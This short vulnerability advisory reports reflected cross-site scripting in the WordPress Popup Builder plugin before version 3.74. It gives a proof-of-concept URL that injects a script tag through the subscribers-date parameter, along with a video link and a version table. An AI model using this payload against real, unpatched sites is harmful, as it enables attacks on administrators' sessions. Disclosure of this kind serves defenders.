The βAll Subscribersβ setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.
http://example.com/wp-admin/edit.php?post_type=popupbuilder&page;=sgpbSubscribers&sgpb-subscribers-date;="><script>alert(origin)<%2Fscript> Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg
CPE | Name | Operator | Version |
---|---|---|---|
popup-builder | lt | 3.74 |